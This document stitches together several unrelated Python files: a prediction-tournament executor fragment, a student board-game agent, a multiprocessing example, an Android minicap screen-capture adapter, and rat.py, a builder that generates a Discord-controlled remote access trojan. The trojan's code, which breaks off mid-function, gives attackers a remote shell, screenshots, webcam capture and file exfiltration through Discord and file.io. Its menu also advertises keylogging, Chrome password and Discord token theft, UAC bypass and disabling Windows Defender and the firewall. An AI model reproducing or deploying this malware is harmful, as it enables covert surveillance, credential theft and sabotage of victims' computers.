purchase_info = self._get_purchase_info(execution_start_at)
if purchase_info is None:
df_weight = None
else:
df_weight = purchase_info['df_weight']
df_current = fetch_current_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_at=execution_start_at,
without_fetch_events=without_fetch_events,
)
return blend_predictions(
df_current=df_current,
df_weight=df_weight,
)
def _run(self):
while not self._thread_terminated:
try:
if not self._initialized:
self._initialize()
self._initialized = True
self._step()
except Exception as e:
self._logger.error(e)
self._logger.error(traceback.format_exc())
time.sleep(self._interval_sec)
def _step_purchase(self, execution_start_at):
purchase_info = self._get_purchase_info(execution_start_at)
if purchase_info is not None:
return
execution_start_ats = np.sort(
execution_start_at
- day_seconds * np.arange(2, 2 + self._evaluation_periods)
)
df = fetch_historical_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_ats=execution_start_ats,
logger=self._logger,
)
df_current = fetch_current_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_at=execution_start_at,
)
df_market = self._market_data_store.fetch_df_market(
symbols=self._symbol_white_list,
)
params = create_model_selection_params(
df=df,
df_current=df_current,
df_market=df_market,
execution_start_ats=execution_start_ats,
symbols=self._symbol_white_list
)
params.budget = self._budget_rate * self._store.get_balance()
        # Model selection
df_weight = self._model_selector.select_model(params)
df_weight = df_weight.loc[df_weight['weight'] > 0]
self._logger.debug('df_weight {}'.format(df_weight))
        # Purchase
create_purchase_params_list = df_weight_to_purchase_params_list(
df_current=df_current,
df_weight=df_weight,
execution_start_at=execution_start_at
)
self._store.create_purchases(create_purchase_params_list)
self._set_purchase_info(execution_start_at, {
'df_weight': df_weight
})
def _step(self):
now = int(self._time_func())
t = self._tournament
purchase_time_buffer = int(t['purchase_time'] * 0.2)
purchase_start_at = (t['execution_start_at'] - t['execution_preparation_time'] -
t['shipping_time'] - t['purchase_time'] + purchase_time_buffer)
interval = t['execution_time']
if (now - purchase_start_at) % interval < t['purchase_time'] - purchase_time_buffer:
execution_start_at = ((now - purchase_start_at) // interval) * interval + t['execution_start_at']
self._step_purchase(execution_start_at)
def _initialize(self):
self._market_data_store.fetch_df_market(
symbols=self._symbol_white_list,
)
def _purchase_info_key(execution_start_at):
return 'purchase_info:{}'.format(execution_start_at)
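# Executor._step() above only calls _step_purchase() while "now" falls inside
# the purchase window of the current execution interval.  The function below
# restates that window check on its own, using the same tournament fields;
# it is an illustrative sketch and is not used by the Executor.
def _in_purchase_window_sketch(now, tournament):
    t = tournament
    buffer_sec = int(t['purchase_time'] * 0.2)
    purchase_start_at = (t['execution_start_at'] - t['execution_preparation_time']
                         - t['shipping_time'] - t['purchase_time'] + buffer_sec)
    return (now - purchase_start_at) % t['execution_time'] < t['purchase_time'] - buffer_sec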
|
student_agent.py
|
# Student agent: Add your own agent here
from collections import defaultdict, namedtuple
from importlib.resources import path
from random import random, choice, randint
from shutil import move
from agents.agent import Agent
from store import register_agent
from threading import Thread
@register_agent("student_agent")
class StudentAgent(Agent):
"""
A dummy class for your implementation. Feel free to use this class to
add any helper functionalities needed for your agent.
"""
def __init__(self):
super(StudentAgent, self).__init__()
self.name = "Thanos"
self.autoplay = True
self.dir_map = {
"u": 0,
"r": 1,
"d": 2,
"l": 3,
}
def step(self, chess_board, my_pos, adv_pos, max_step):
dim = (max_step * 2) - 1
i, j = my_pos
pos_bars = chess_board[i, j]
"""
Implement the step function of your agent here.
You can use the following variables to access the chess board:
- chess_board: a numpy array of shape (x_max, y_max, 4)
- my_pos: a tuple of (x, y)
- adv_pos: a tuple of (x, y)
- max_step: an integer
You should return a tuple of ((x, y), dir),
where (x, y) is the next position of your agent and dir is the direction of the wall
you want to put on.
Please check the sample implementation in agents/random_agent.py or agents/human_agent.py for more details.
"""
# dummy return
analyzer = Thread(target=self.analyze, name="Analyzer", args=(my_pos, chess_board, adv_pos, max_step), daemon=True)
analyzer.start()
analyzer.join()
# self.analyze(my_pos, chess_board, adv_pos, max_step)
        return my_pos, self.dir_map["u"]
def analyze(self, my_pos: tuple, chess_board, adv_pos: tuple, max_steps: int):
dimension = (max_steps * 2) - 1
print("=" * 30)
print("Starting Thread...")
path = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
print(path)
print("-" * 30)
print("Thread just ended")
print("=" * 30)
def paths(self, max_steps, chess_board, my_pos, adv_pos, dimension):
x, y = my_pos
depth = 0
node = Vertex(l=None, r=None, u=None, d=None, adv=False, x_val=x, y_val=y)
if depth == max_steps:
return node
if my_pos == adv_pos:
return node
else:
while max_steps > 0:
for d in range(4):
if d == 0:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
my_pos = self.move(my_pos, d)
max_steps = max_steps - 1
node.up = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 1:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.right = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 2:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.down = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 3:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.left = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
max_steps = max_steps - 1
depth = depth + 1
return node
def move(self, position: tuple, direction: int):
moves = ((-1, 0), (0, 1), (1, 0), (0, -1))
x, y = position
movex, movey = moves[direction]
pos = (x + movex, y + movey)
return pos
def putbarrier(self, position: tuple, direction: int):
if self.is_barrier(position, direction):
for i in range(4):
self.putbarrier(position, i)
else:
dir = self.dir_map.get(direction)
return dir
def is_boundary(self, position: tuple, dimension: int):
x, y = position
return 0 == x == dimension or 0 == y == dimension
def is_barrier(self, board, position: tuple, direction: int, dimension: int):
x, y = position
value = board[x, y]
if self.is_boundary(position, dimension):
return True
return value[direction]
def barrier_count(self, position: tuple, dimension: int, board):
barrier = 0
for i in self.dir_map.values():
if self.is_barrier(board, position, i, dimension):
barrier = barrier + 1
return barrier
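# paths() above walks the board recursively, but it decrements max_steps and
# reassigns my_pos in place, so sibling branches do not explore independent
# paths.  A common alternative for "which cells can I reach within max_step
# moves" is a breadth-first search over the wall grid.  The sketch below is
# illustrative only; it assumes chess_board[x, y, d] is truthy when a wall
# blocks direction d (the same convention is_barrier() reads) and that the
# adversary's square cannot be stepped onto.
def reachable_positions_sketch(chess_board, my_pos, adv_pos, max_step):
    from collections import deque
    moves = ((-1, 0), (0, 1), (1, 0), (0, -1))  # up, right, down, left
    seen = {my_pos}
    queue = deque([(my_pos, 0)])
    while queue:
        (x, y), dist = queue.popleft()
        if dist == max_step:
            continue
        for d, (dx, dy) in enumerate(moves):
            if chess_board[x, y, d]:  # wall blocks this direction
                continue
            nxt = (x + dx, y + dy)
            if nxt == adv_pos or nxt in seen:
                continue
            seen.add(nxt)
            queue.append((nxt, dist + 1))
    return seen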
class Vertex(object):
def __init__(self, l, r, u, d, adv, x_val, y_val):
self.name = "cell (" + str(x_val) + "," + str(y_val) + ")"
self.has_enemy = adv
self.right = r
self.left = l
self.up = u
self.down = d
self.x_val = x_val
self.y_val = y_val
def __repr__(self):
return str({
'name': self.name,
'has_enemy': self.has_enemy,
'right': self.right,
'left': self.left,
'up': self.up,
'down': self.down,
'x': self.x_val,
'y' : self.y_val
})
class Graph(object):
# G = (V, E)
# V = Vertext
# E = Edge: (V1 - V2)
graph = defaultdict(list)
def __init__(self, graphdic = None):
if graphdic is None:
graphdic = {}
self.graphdic = graphdic
def getVertices(self):
return list(self.graphdic.keys())
def getEdges(self):
return list(self.graphdic.values())
def setVertex(self, vertex):
if vertex.name not in self.graphdic:
self.graphdic[vertex] = []
def setEdge(self, edge):
edge = set(edge)
(vertex_1, vertex_2) = tuple(edge)
if vertex_1 in self.graphdic:
self.graphdic[vertex_1].append(vertex_2)
else:
self.graphdic[vertex_1] = [vertex_2]
def find_distinct_edges(self):
edgename = []
for vertex in self.graphdic:
for next_vertex in self.graphdic[vertex]:
if {next_vertex, vertex} not in edgename:
edgename.append({vertex, next_vertex})
return edgename
|
spawn_a_process.py
|
#Spawn a Process – Section 3: Process Based Parallelism
import multiprocessing
"""
Parallelism with a process object in three steps:
1. create the process object
2. obj_process.start() -> starts the process
3. obj_process.join() -> waits until the process finishes before the calling thread moves on to its next instruction
"""
def function(i):
print ('called function in process: %s' %i)
return
if __name__ == '__main__':
Process_jobs = []
for i in range(5):
p = multiprocessing.Process(target=function, args=(i,))
Process_jobs.append(p)
p.start()
p.join()
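# Note: the loop above starts and joins each process in the same iteration,
# so the five workers actually run one after another.  The helper below is an
# illustrative variant (not part of the original example) that starts them
# all first and only then joins, letting them run concurrently.
def run_concurrently(count=5):
    jobs = [multiprocessing.Process(target=function, args=(i,)) for i in range(count)]
    for p in jobs:
        p.start()
    for p in jobs:
        p.join()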
|
minicap.py
|
import logging
import socket
import subprocess
import time
import os
from datetime import datetime
from .adapter import Adapter
MINICAP_REMOTE_ADDR = "localabstract:minicap"
ROTATION_CHECK_INTERVAL_S = 1 # Check rotation once per second
class MinicapException(Exception):
"""
Exception in minicap connection
"""
pass
class Minicap(Adapter):
"""
a connection with target device through minicap.
"""
def __init__(self, device=None):
"""
initiate a minicap connection
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.host = "localhost"
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.port = self.device.get_random_port()
self.remote_minicap_path = "/data/local/tmp/minicap-devel"
self.sock = None
self.connected = False
self.minicap_process = None
self.banner = None
self.width = -1
self.height = -1
self.orientation = -1
self.last_screen = None
self.last_screen_time = None
self.last_views = []
self.last_rotation_check_time = datetime.now()
def set_up(self):
device = self.device
try:
minicap_files = device.adb.shell("ls %s 2>/dev/null" % self.remote_minicap_path).split()
if "minicap.so" in minicap_files and ("minicap" in minicap_files or "minicap-nopie" in minicap_files):
self.logger.debug("minicap was already installed.")
return
except:
pass
if device is not None:
# install minicap
import pkg_resources
local_minicap_path = pkg_resources.resource_filename("droidbot", "resources/minicap")
try:
device.adb.shell("mkdir %s" % self.remote_minicap_path)
except Exception:
pass
abi = device.adb.get_property('ro.product.cpu.abi')
sdk = device.get_sdk_version()
if sdk >= 16:
minicap_bin = "minicap"
else:
minicap_bin = "minicap-nopie"
minicap_bin_path = os.path.join(local_minicap_path, 'libs', abi, minicap_bin)
device.push_file(local_file=minicap_bin_path, remote_dir=self.remote_minicap_path)
minicap_so_path = os.path.join(local_minicap_path, 'jni', 'libs', f'android-{sdk}', abi, 'minicap.so')
device.push_file(local_file=minicap_so_path, remote_dir=self.remote_minicap_path)
self.logger.debug("minicap installed.")
def tear_down(self):
try:
delete_minicap_cmd = "adb -s %s shell rm -r %s" % (self.device.serial, self.remote_minicap_path)
p = subprocess.Popen(delete_minicap_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception:
pass
def connect(self):
device = self.device
display = device.get_display_info(refresh=True)
if 'width' not in display or 'height' not in display or 'orientation' not in display:
self.logger.warning("Cannot get the size of current device.")
return
w = display['width']
h = display['height']
        if w > h:
            # minicap expects portrait dimensions; swap if the display is reported in landscape
            w, h = h, w
o = display['orientation'] * 90
self.width = w
self.height = h
self.orientation = o
size_opt = "%dx%d@%dx%d/%d" % (w, h, w, h, o)
grant_minicap_perm_cmd = "adb -s %s shell chmod -R a+x %s" % \
(device.serial, self.remote_minicap_path)
start_minicap_cmd = "adb -s %s shell LD_LIBRARY_PATH=%s %s/minicap -P %s" % \
(device.serial, self.remote_minicap_path, self.remote_minicap_path, size_opt)
self.logger.debug("starting minicap: " + start_minicap_cmd)
p = subprocess.Popen(grant_minicap_perm_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
self.minicap_process = subprocess.Popen(start_minicap_cmd.split(),
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Wait 2 seconds for starting minicap
time.sleep(2)
self.logger.debug("minicap started.")
try:
# forward host port to remote port
forward_cmd = "adb -s %s forward tcp:%d %s" % (device.serial, self.port, MINICAP_REMOTE_ADDR)
subprocess.check_call(forward_cmd.split())
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
import threading
listen_thread = threading.Thread(target=self.listen_messages)
listen_thread.start()
except socket.error as e:
self.connected = False
self.logger.warning(e)
raise MinicapException()
def listen_messages(self):
self.logger.debug("start listening minicap images ...")
CHUNK_SIZE = 4096
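        # The minicap stream starts with a global banner, parsed byte by byte below:
        # version (1 byte), banner length (1 byte), pid (4 bytes), real width/height
        # (4 bytes each), virtual width/height (4 bytes each), orientation (1 byte),
        # quirks (1 byte). After the banner, each frame is a 4-byte little-endian
        # body length followed by that many bytes of JPEG data.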
readBannerBytes = 0
bannerLength = 2
readFrameBytes = 0
frameBodyLength = 0
frameBody = bytearray()
banner = {
"version": 0,
"length": 0,
"pid": 0,
"realWidth": 0,
"realHeight": 0,
"virtualWidth": 0,
"virtualHeight": 0,
"orientation": 0,
"quirks": 0,
}
self.connected = True
while self.connected:
chunk = bytearray(self.sock.recv(CHUNK_SIZE))
if not chunk:
continue
chunk_len = len(chunk)
cursor = 0
while cursor < chunk_len and self.connected:
if readBannerBytes < bannerLength:
if readBannerBytes == 0:
banner['version'] = chunk[cursor]
elif readBannerBytes == 1:
banner['length'] = bannerLength = chunk[cursor]
elif 2 <= readBannerBytes <= 5:
banner['pid'] += (chunk[cursor] << ((readBannerBytes - 2) * 8))
elif 6 <= readBannerBytes <= 9:
banner['realWidth'] += (chunk[cursor] << ((readBannerBytes - 6) * 8))
elif 10 <= readBannerBytes <= 13:
banner['realHeight'] += (chunk[cursor] << ((readBannerBytes - 10) * 8))
elif 14 <= readBannerBytes <= 17:
banner['virtualWidth'] += (chunk[cursor] << ((readBannerBytes - 14) * 8))
elif 18 <= readBannerBytes <= 21:
banner['virtualHeight'] += (chunk[cursor] << ((readBannerBytes - 18) * 8))
elif readBannerBytes == 22:
banner['orientation'] += chunk[cursor] * 90
elif readBannerBytes == 23:
banner['quirks'] = chunk[cursor]
cursor += 1
readBannerBytes += 1
if readBannerBytes == bannerLength:
self.banner = banner
self.logger.debug("minicap initialized: %s" % banner)
elif readFrameBytes < 4:
frameBodyLength += (chunk[cursor] << (readFrameBytes * 8))
cursor += 1
readFrameBytes += 1
else:
if chunk_len - cursor >= frameBodyLength:
frameBody += chunk[cursor: cursor + frameBodyLength]
self.handle_image(frameBody)
cursor += frameBodyLength
frameBodyLength = readFrameBytes = 0
frameBody = bytearray()
else:
frameBody += chunk[cursor:]
frameBodyLength -= chunk_len - cursor
readFrameBytes += chunk_len - cursor
cursor = chunk_len
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def handle_image(self, frameBody):
# Sanity check for JPG header, only here for debugging purposes.
if frameBody[0] != 0xFF or frameBody[1] != 0xD8:
self.logger.warning("Frame body does not start with JPG header")
self.last_screen = frameBody
self.last_screen_time = datetime.now()
self.last_views = None
self.logger.debug("Received an image at %s" % self.last_screen_time)
self.check_rotation()
def check_rotation(self):
current_time = datetime.now()
if (current_time - self.last_rotation_check_time).total_seconds() < ROTATION_CHECK_INTERVAL_S:
return
display = self.device.get_display_info(refresh=True)
if 'orientation' in display:
cur_orientation = display['orientation'] * 90
if cur_orientation != self.orientation:
self.device.handle_rotation()
self.last_rotation_check_time = current_time
def check_connectivity(self):
"""
        check if the minicap connection is alive and receiving screens
:return: True for connected
"""
if not self.connected:
return False
if self.last_screen_time is None:
return False
return True
def disconnect(self):
"""
        disconnect minicap
"""
self.connected = False
if self.sock is not None:
try:
self.sock.close()
except Exception as e:
print(e)
if self.minicap_process is not None:
try:
self.minicap_process.terminate()
except Exception as e:
print(e)
try:
forward_remove_cmd = "adb -s %s forward --remove tcp:%d" % (self.device.serial, self.port)
p = subprocess.Popen(forward_remove_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception as e:
print(e)
def get_views(self):
"""
get UI views using cv module
        opencv-python needs to be installed for this function
:return: a list of views
"""
if not self.last_screen:
self.logger.warning("last_screen is None")
return None
if self.last_views:
return self.last_views
from . import cv
img = cv.load_image_from_buf(self.last_screen)
view_bounds = cv.find_views(img)
root_view = {
"class": "CVViewRoot",
"bounds": [[0, 0], [self.width, self.height]],
"enabled": True,
"temp_id": 0
}
views = [root_view]
temp_id = 1
for x,y,w,h in view_bounds:
view = {
"class": "CVView",
"bounds": [[x,y], [x+w, y+h]],
"enabled": True,
"temp_id": temp_id,
"signature": cv.calculate_dhash(img[y:y+h, x:x+w]),
"parent": 0,
"children": []
}
views.append(view)
temp_id += 1
root_view["children"] = list(range(1, temp_id))
self.last_views = views
return views
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
minicap = Minicap()
try:
minicap.set_up()
minicap.connect()
except:
minicap.disconnect()
minicap.tear_down()
minicap.device.disconnect()
|
rat.py
|
from colorama import Fore
import time, sys, os, ctypes, shutil
def discordrat():
def spinner():
l = ['|', '/', '-', '\\']
for i in l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Creating File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
print('\n')
for i in l+l+l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Writing File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
os.system('cls')
discordrattitle()
print(f"""{y}[{w}+{y}]{w} Enter the name you want to give to the final file: """)
global filename
fileName = str(input(f"""{y}[{b}#{y}]{w} File name: """))
print(f"""\n\n{y}[{w}+{y}]{w} Enter the token of the bot you will use to execute the RAT commands: """)
global tokenbot
tokenbot = str(input(f"""{y}[{b}#{y}]{w} Bot token: """))
print('\n')
spinner()
try:
with open(f"temp/{fileName}.py", "w") as file:
file.write("""import winreg, ctypes, asyncio, discord, sys, os, ssl, random, threading, time, cv2, subprocess, discord
helpmenu = """+'"""'+"""
Availaible commands are :
--> !message = Show a message box displaying your text / Syntax = "!message example"
--> !shell = Execute a shell command /Syntax = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get chrome browser history
--> !download = Download a file from infected computer
--> !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
--> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !startkeylogger = Starts a keylogger
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume to max
--> !volumezero = Put volume at 0
--> !idletime = Get the idle time of user's on target computer
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
--> !uacbypass = attempt to bypass uac to gain admin by using fod helper
--> !passwords = grab all chrome passwords
--> !streamwebcam = streams webcam by sending multiple pictures
--> !stopwebcam = stop webcam stream
--> !getdiscordinfo = get discord token,email,phone number,etc
--> !streamscreen = stream screen by sending multiple pictures
--> !stopscreen = stop screen stream
--> !shutdown = shutdown computer
--> !restart = restart computer
--> !logoff = log off current user
--> !bluescreen = BlueScreen PC
--> !displaydir = display all items in current dir
--> !currentdir = display the current dir
--> !dateandtime = display system date and time
--> !prockill = kill a process by name / syntax = "!kill process.exe"
--> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
--> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
--> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
--> !disableantivirus = permanently disable windows defender(requires admin)
--> !disablefirewall = disable windows firewall (requires admin)
--> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
--> !selfdestruct = delete all traces that this program was on the target PC
--> !windowspass = attempt to phish password by poping up a password dialog
--> !displayoff = turn off the monitor(Admin rights are required)
--> !displayon = turn on the monitors(Admin rights are required)
--> !hide = hide the file by changing the attribute to hidden
--> !unhide = unhide the file the removing the attribute to make it unhidden
--> !ejectcd = eject the cd drive on computer
--> !retractcd = retract the cd drive on the computer
--> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
--> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
--> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
--> !distaskmgr = disable task manager(Admin rights are required)
--> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
--> !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
--> !startup = add file to startup(when computer go on this file starts)(Admin rights are required)
"""+'"""'+"""
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
from discord.ext import commands
from ctypes import *
from discord import utils
token = '~~TOKENHERE~~'
global appdata
appdata = os.getenv('APPDATA')
client = discord.Client()
bot = commands.Bot(command_prefix='!')
ssl._create_default_https_context = ssl._create_unverified_context
async def activity(client):
import time
import win32gui
while True:
global stop_threads
if stop_threads:
break
current_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
window_displayer = discord.Game(f"Visiting: {current_window}")
await client.change_presence(status=discord.Status.online, activity=window_displayer)
time.sleep(1)
def between_callback(client):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(activity(client))
loop.close()
@client.event
async def on_ready():
import platform
import re
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
flag = data['country_code']
ip = data['IPv4']
import os
total = []
global number
number = 0
global channel_name
channel_name = None
for x in client.get_all_channels():
total.append(x.name)
for y in range(len(total)):
if "session" in total[y]:
import re
result = [e for e in re.split("[^0-9]", total[y]) if e != '']
biggest = max(map(int, result))
number = biggest + 1
else:
pass
if number == 0:
channel_name = "session-1"
newchannel = await client.guilds[0].create_text_channel(channel_name)
else:
channel_name = f"session-{number}"
newchannel = await client.guilds[0].create_text_channel(channel_name)
channel_ = discord.utils.get(client.get_all_channels(), name=channel_name)
channel = client.get_channel(channel_.id)
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
value1 = f"@here :white_check_mark: New session opened {channel_name} | {platform.system()} {platform.release()} | :flag_{flag.lower()}: | User : {os.getlogin()}"
if is_admin == True:
await channel.send(f'{value1} | admin!')
elif is_admin == False:
await channel.send(value1)
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
def volumeup():
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
if volume.GetMute() == 1:
volume.SetMute(0, None)
volume.SetMasterVolumeLevel(volume.GetVolumeRange()[1], None)
def volumedown():
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
volume.SetMasterVolumeLevel(volume.GetVolumeRange()[0], None)
def critproc():
import ctypes
ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0
def uncritproc():
import ctypes
ctypes.windll.ntdll.RtlSetProcessIsCritical(0, 0, 0) == 0
@client.event
async def on_message(message):
if message.channel.name != channel_name:
pass
else:
total = []
for x in client.get_all_channels():
total.append(x.name)
if message.content.startswith("!kill"):
try:
if message.content[6:] == "all":
for y in range(len(total)):
if "session" in total[y]:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=total[y])
await channel_to_delete.delete()
else:
pass
else:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=message.content[6:])
await channel_to_delete.delete()
await message.channel.send(f"[*] {message.content[6:]} killed.")
except:
await message.channel.send(f"[!] {message.content[6:]} is invalid,please enter a valid session name")
if message.content == "!dumpkeylogger":
import os
temp = os.getenv("TEMP")
file_keys = temp + r"\key_log.txt"
file = discord.File(file_keys, filename="key_log.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.popen(f"del {file_keys}")
if message.content == "!exit":
import sys
uncritproc()
sys.exit()
if message.content == "!windowstart":
import threading
global stop_threads
stop_threads = False
global _thread
_thread = threading.Thread(target=between_callback, args=(client,))
_thread.start()
await message.channel.send("[*] Window logging for this session started")
if message.content == "!windowstop":
stop_threads = True
await message.channel.send("[*] Window logging for this session stopped")
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
if message.content == "!screenshot":
import os
from mss import mss
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(path)
if message.content == "!volumemax":
volumeup()
await message.channel.send("[*] Volume put to 100%")
if message.content == "!volumezero":
volumedown()
await message.channel.send("[*] Volume put to 0%")
if message.content == "!webcampic":
import os
import time
import cv2
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
#time.sleep(0.1)
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
del(camera)
file = discord.File(temp + r"\\temp.png", filename="temp.png")
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!message"):
import ctypes
import time
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
def mess():
ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box
import threading
messa = threading.Thread(target=mess)
messa._running = True
messa.daemon = True
messa.start()
import win32con
import win32gui
def get_all_hwnd(hwnd,mouse):
def winEnumHandler(hwnd, ctx):
if win32gui.GetWindowText(hwnd) == "Error":
win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
return None
else:
pass
if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):
win32gui.EnumWindows(winEnumHandler,None)
win32gui.EnumWindows(get_all_hwnd, 0)
if message.content.startswith("!wallpaper"):
import ctypes
import os
path = os.path.join(os.getenv('TEMP') + r"\\temp.jpg")
await message.attachments[0].save(path)
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0)
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!upload"):
await message.attachments[0].save(message.content[8:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!shell"):
global status
import time
status = None
import subprocess
import os
instruction = message.content[7:]
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
dele = "del" + temp + r"\output.txt"
os.popen(dele)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
status = None
if message.content.startswith("!download"):
import subprocess
import os
filename=message.content[10:]
check2 = os.stat(filename).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
response = requests.post('https://file.io/', files={"file": open(filename, "rb")}).json()["link"]
await message.channel.send("download link: " + response)
await message.channel.send("[*] Command successfuly executed")
else:
file = discord.File(message.content[10:], filename=message.content[10:])
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!cd"):
import os
os.chdir(message.content[4:])
await message.channel.send("[*] Command successfuly executed")
if message.content == "!help":
import os
temp = (os.getenv('TEMP'))
f5 = open(temp + r"\helpmenu.txt", 'a')
f5.write(str(helpmenu))
f5.close()
temp = (os.getenv('TEMP'))
file = discord.File(temp + r"\helpmenu.txt", filename="helpmenu.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\helpmenu.txt /f")
if message.content.startswith("!write"):
import pyautogui
if message.content[7:] == "enter":
pyautogui.press("enter")
else:
pyautogui.typewrite(message.content[7:])
if message.content == "!clipboard":
import ctypes
import os
CF_TEXT = 1
kernel32 = ctypes.windll.kernel32
kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
kernel32.GlobalLock.restype = ctypes.c_void_p
